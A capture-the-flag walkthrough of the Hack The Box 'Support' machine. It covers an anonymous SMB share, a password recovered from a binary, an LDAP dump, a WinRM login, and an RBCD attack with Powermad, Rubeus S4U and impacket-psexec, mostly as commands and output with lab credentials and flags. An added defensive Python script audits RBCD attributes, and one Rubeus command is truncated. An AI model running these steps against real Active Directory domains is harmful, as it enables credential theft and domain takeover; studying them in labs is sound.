
HTB Support

Start with an nmap scan

# nmap -sS -sV -A -Pn 10.129.250.29
<...>
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-02-12 09:31:59Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
<...>

SMB is open, so try a null session to list the shares

# smbclient -N -L //10.129.250.29
    Sharename       Type      Comment
    ---------       ----      -------
    support-tools   Disk      support staff tools
    <...>

Connect to the share

$ smbclient -N //10.129.250.29/support-tools
smb: \> ls
  UserInfo.exe.zip                    A   277499  Wed Jul 20 12:01:07 2022

Download it and test the exe; it does not seem to work as-is

Reversing the binary yields the password nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz

Use ldapsearch with that password to dump the directory

ldapsearch -x -H ldap://10.129.250.29:389 -D [email protected] -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" > userinfo

Searching the dump turns up

# support, Users, support.htb
dn: CN=support,CN=Users,DC=support,DC=htb
info: Ironside47pleasure40Watchful

That looks like a password, and it logs in over WinRM

# evil-winrm -i 10.129.250.29 -u "support" -p 'Ironside47pleasure40Watchful'  
*Evil-WinRM* PS C:\Users\support\desktop> type user.txt
84439e34c3d3c18b2773ecaee9b4319d

Next, collect domain information with BloodHound

bloodhound-python -u support -p 'Ironside47pleasure40Watchful' -ns 10.129.250.29 -d support.htb -c All

View the result in BloodHound

[BloodHound screenshot: image-MIcK.png]

[email protected] is a member of the SHARED SUPPORT ACCOUNTS group, which has full control over the DC, so resource-based constrained delegation (RBCD) is possible

Upload Powermad, PowerView and Rubeus.exe

Create a new machine account and get its SID

New-MachineAccount -MachineAccount a -Password (ConvertTo-SecureString '123456' -AsPlainText -Force)
Get-ADComputer -identity a
# Output SID: S-1-5-21-1677581083-3380853377-188903654-6103
$ComputerSid = "S-1-5-21-1677581083-3380853377-188903654-6103"

Build the security descriptor from SDDL and write it to the msDS-AllowedToActOnBehalfOfOtherIdentity attribute

$SD = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Set-ADComputer -Identity dc -Replace @{'msDS-AllowedToActOnBehalfOfOtherIdentity'=$SDBytes}
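From the defender's side, the attribute written above is exactly what an audit should look for. The following is an added example (not code from the writeup): a Python parser for the SDDL form of msDS-AllowedToActOnBehalfOfOtherIdentity that lists which SIDs each computer allows to act on its behalf and flags any not on an allowlist. It assumes the attribute values have already been exported as SDDL text (PowerShell exposes them as ActiveDirectorySecurity objects whose Sddl property gives this form); the sample dump, the WEB01 host and the approved SID are constructed for the example.

```python
import re

# SDDL access-right codes as they appear in the page's full-control string
# CCDCLCSWRPWPDTLOCRSDRCWDWO, plus the generic rights for completeness.
RIGHTS = {
    "CC": "CREATE_CHILD", "DC": "DELETE_CHILD", "LC": "LIST_CHILDREN", "SW": "SELF_WRITE",
    "RP": "READ_PROPERTY", "WP": "WRITE_PROPERTY", "DT": "DELETE_TREE", "LO": "LIST_OBJECT",
    "CR": "CONTROL_ACCESS", "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC",
    "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE",
    "GX": "GENERIC_EXECUTE",
}
DACL_RE = re.compile(r"D:[A-Z]*(\(.*?\))(?:S:|$)")   # DACL section up to an optional SACL
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

def parse_rbcd_sddl(sddl):
    """Return (ace_type, right_names, trustee_sid) for each ACE in the DACL of an
    msDS-AllowedToActOnBehalfOfOtherIdentity descriptor given as SDDL text."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for ace_type, _flags, rights, _obj, _inh_obj, trustee in ACE_RE.findall(m.group(1)):
        if rights.startswith("0x"):            # raw hex access mask, left undecoded
            names = [rights]
        else:
            names = [RIGHTS.get(rights[i:i + 2], rights[i:i + 2]) for i in range(0, len(rights), 2)]
        aces.append((ace_type, names, trustee))
    return aces

def audit_rbcd(entries, expected=()):
    """entries maps computer name -> SDDL text or None (attribute absent). Returns
    {computer: [trustee SIDs]} for every allow ACE whose trustee is not on the allowlist."""
    findings = {}
    for computer, sddl in entries.items():
        if not sddl:
            continue
        trustees = [t for ace_type, _, t in parse_rbcd_sddl(sddl) if ace_type == "A"]
        unexpected = sorted(t for t in trustees if t not in expected)
        if unexpected:
            findings[computer] = unexpected
    return findings

# Constructed sample dump: the DC carries the descriptor written in the page, WEB01 is a
# hypothetical approved delegation, WS01 has the attribute unset.
PAGE_SDDL = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-6103)"
APPROVED_SID = "S-1-5-21-1677581083-3380853377-188903654-1105"   # hypothetical value
SAMPLE_DUMP = {"DC": PAGE_SDDL, "WS01": None,
               "WEB01": f"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;{APPROVED_SID})"}

if __name__ == "__main__":
    for host, sids in audit_rbcd(SAMPLE_DUMP, expected={APPROVED_SID}).items():
        print(f"{host}: RBCD trustees not on the allowlist: {', '.join(sids)}")
```

Any computer reported here, above all a domain controller, warrants checking who wrote the attribute (event 5136 with directory service change auditing enabled) and clearing it if the delegation is not intended.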

Compute the machine account's rc4_hmac hash

.\Rubeus.exe hash /password:123456 /user:a$ /domain:support.htb
# [*]       rc4_hmac             : 32ED87BDB5FDC5E9CBA88547376818D4

Request the service ticket via S4U

.\Rubeus.exe s4u /user:a$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.suppor

This returns a base64 string; save it as ticket.b64 and convert it to a ccache

cat ticket.b64 | base64 -d > ticket.kirbi
impacket-ticketConverter ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache

Get a shell and grab the flag

impacket-psexec support.htb/[email protected] -k -no-pass
C:\Users\Administrator\Desktop> type root.txt
55717432af1ba9bdd6b88d5a91d2732e

Takeaway: this box teaches the RBCD attack

License: CC BY 4.0